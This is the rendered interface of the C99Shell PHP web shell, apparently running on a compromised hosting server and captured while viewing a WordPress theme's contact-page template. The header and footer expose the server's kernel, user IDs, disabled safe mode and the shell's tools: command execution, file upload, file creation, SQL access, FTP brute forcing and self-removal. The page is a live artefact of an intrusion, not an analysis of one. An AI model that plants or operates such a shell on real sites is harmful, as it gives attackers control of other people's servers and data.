!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/themes/kingsize/   drwxr-xr-x
Free 181.16 GB of 490.84 GB (36.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     template-contact.php (3.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 Template Name: Contact Page
 **/
$tpl_body_id 'contactpage';
get_header(); 
global 
$postParentPageID,$data;
$postParentPageID $post->ID//Page POSTID
?>

<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
            
            <!--Page title start-->
            <?php if ( $data['wm_show_page_post_headers'] == "" || $data['wm_show_page_post_headers'] == "0" ) {?>
            <div class="row header">
                <div class="blog_title">
                    <h2 class="title-page"><?php the_title(); ?></h2>
                </div>
            </div>
            <?php } else { ?>
            <div class="row header">
                <div class="blog_title">
                    <h2 class="title-page"></h2>
                </div>
            </div>
            <?php ?>
            <!--Page title ends-->

            <!--Contact Form Start-->          
            <div class="row">
                <div class="blog">
                    <div class="blog_block_left">
                        <div class="blog_post">                                                    
                            <div class="blog_text"><?php the_content(); ?></div>
                        </div>
                        <div class="blog_post">
                            <form  action="php/contact-send.php" id="contact_form" method="post">
                                <div class="row">
                                   <label class="form_label" for='form_name'><?php _e('Name''kslang'); ?></label>    
                                   <input id="form_name"  type="text" class="six columns text center"  name="name" value="<?php _e('Name''kslang'); ?>">
                                </div>
                                
                                <br/>   

                                <div class="row">
                                 <label class="form_label" for='form_email'><?php _e('E-mail''kslang'); ?></label>
                                 <input id="form_email"  type="text" class="six columns" name="email" value="<?php _e('E-mail''kslang'); ?>">
                                </div>
                                
                                <br/>
                                
                                <div class="row">
                                   <label class="form_label" for='form_message'><?php _e('Message''kslang'); ?></label>
                                   <textarea id="form_message" class="twelve columns" rows="12" name="message" placeholder="Message"></textarea>
                                </div>
                                
                                <br/>
                                
                                <div class="row">
                                  <input id="form_submit" type="submit" class="send-link" value="<?php _e('Send message''kslang'); ?>">
                                </div>

                                <!-- hidden input for basic spam protection -->
                                <div class='hide'>
                                    <label for='spamCheck'>Do not fill out this field</label>
                                    <input id="spamCheck" name='spam_check' type='text' value='' />
                                </div>
                            </form>

                            <!-- This div will be shown if mail was sent successfully -->        
                            <div class="hide success">
                                <p><?php if ( $data['wm_contact_email_template']!= "" ) {?><?php echo $data['wm_contact_email_template'];?><?php } else { ?><?php _e('Thank you for contacting us! Your message has been successfully delivered and we will be getting in touch real soon!''kslang'); ?><?php ?></p>
                            </div>

                        </div>
                    </div>

                    <!-- Sidebar -->
                    <div class="sidebar_contact blog_block_right">
                        <?php if ( !function_exists('generated_dynamic_sidebar') || !generated_dynamic_sidebar("Contact Page Sidebar") ) : ?>
                        <?php endif; ?>
                    </div>
                    <!-- Sidebar ends here--> 

                </div>  
            </div>
            <!--Contact Form End-->
    
<?php endwhile; endif; ?>

<?php get_footer(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0222 ]--